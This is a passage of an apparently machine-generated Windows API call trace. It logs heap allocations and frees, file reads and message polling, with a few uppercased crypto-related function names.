[0043.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0043.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0043.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0043.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0043.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0043.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0043.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0043.239] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0043.239] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x1dee, lpOverlapped=0x0) returned 1 [0043.240] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0043.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0043.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0043.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1dee) returned 0xac2018 [0043.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0043.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0043.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0043.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0043.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0043.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0043.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1dee) returned 0xac3e10 [0043.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0043.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.241] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0043.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0043.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1dee) returned 0xac2018 [0043.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0043.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0043.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0043.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.241] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0043.241] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0043.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.241] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0043.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0043.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0043.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0043.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0043.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0043.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1dee) returned 0xac2018 [0043.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0043.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0043.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0043.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0043.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da288 [0043.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0043.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0043.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0043.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da318 [0043.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0043.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0043.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0043.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c748 [0043.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0043.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0043.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0043.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0043.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0043.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1dee) returned 0xac5c08 [0043.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0043.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0043.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0043.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0043.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0043.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0043.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0043.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0043.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0043.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0043.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0043.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0043.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0043.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0043.243] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0043.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0043.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0043.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0043.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0043.243] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0043.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0043.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0043.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0043.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0043.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0043.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0043.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0043.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0043.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0043.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0043.243] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0043.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0043.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0043.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3e8 [0043.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0043.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0043.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0043.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0043.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889aa8 [0043.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0043.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0043.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0043.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0043.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0043.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0043.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0043.244] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0043.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0043.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0043.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0043.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0043.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0043.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0043.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0043.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0043.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0043.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0043.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0043.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0043.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0043.244] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0043.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0043.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0043.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0043.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0043.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0043.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0043.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0043.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0043.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0043.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0043.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0043.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0043.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0043.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0043.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0043.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0043.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0043.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0043.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0043.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0043.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0043.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.245] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0043.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0043.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0043.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0043.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0043.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0043.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0043.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0043.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0043.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0043.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0043.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0043.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0043.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0043.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0043.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0043.246] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0043.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0043.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0043.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0043.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0043.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0043.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0043.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0043.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.246] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.246] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0043.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb50 [0043.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0043.246] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0043.246] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0043.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0043.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0043.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0043.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0043.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0043.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0043.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0043.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0043.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0043.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0043.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.247] RtlAllocateHeap (HeapHandle=0x770000, 